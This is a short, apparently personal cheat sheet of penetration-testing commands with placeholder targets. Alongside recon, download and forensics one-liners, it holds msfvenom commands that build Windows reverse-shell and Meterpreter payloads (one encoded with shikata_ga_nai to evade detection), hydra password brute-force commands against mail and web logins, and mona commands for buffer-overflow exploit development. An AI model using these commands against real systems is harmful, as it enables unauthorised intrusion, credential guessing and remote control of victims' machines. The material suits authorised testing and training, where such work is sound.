wget -r -np -nH --cut-dirs=3 -R index.html <DIRECTORY>
yt-dlp --merge-output-format mp4 -f "bestvideo+bestaudio[ext=m4a]/best" -a likes.txt
tshark -r <PACKET_FILE> -Tfields -e dns.qry.name -Y "ip.src_host==<IP_ADDRESS>" > <TXT_FILE>
ffuf -w <WORDLIST> -u http://<IP_ADDRESS>/FUZZ -o <OUTPUT_FILE> --recursion -fc 403
nmap -sC -sV --oN <OUTPUT_FILE> -vv -Pn <IP_ADDRESS>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LISTENING_IP_ADDRESS> LPORT=<LISTENING_PORT> -f exe -e x86/shikata_ga_nai -o <OUTPUT_FILE>
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f py -b [bad characters]
hydra -S -v -l <USERNAME> -P <PASSWORD> -s 995 -f <IP_ADDRESS> <SERVICE> -V
hydra -t 4 -V -l <USERNAME> -P <PASSWORD_LIST> <IP_ADDRESS> http-post-form "<DIRECTORY>:<RAW_POST_REQUEST>:<ERROR_MESSAGE>"
hydra -l usernames.txt -P <PASSWORD> <IP_ADDRESS> http-get / -V
!mona bytearray -b "\x00"
!mona compare -f <binary file> -a <address>
!mona jmp -r esp -cpb [bad characters]
./vol.py -f <PATH_TO_MEMDUMP> windows.dumpfiles.DumpFiles --dump --pid <PID>
xxd -p <path/to/.DS_Store> | sed 's/00//g' | tr -d '\n' | sed 's/\([0-9A-F]\{2\}\)/0x\1 /g' | xxd -r -p | strings | sed 's/ptb[LN]ustr//g'
openssl s_client -connect <IP_ADDRESS>:<PORT> -crlf -quiet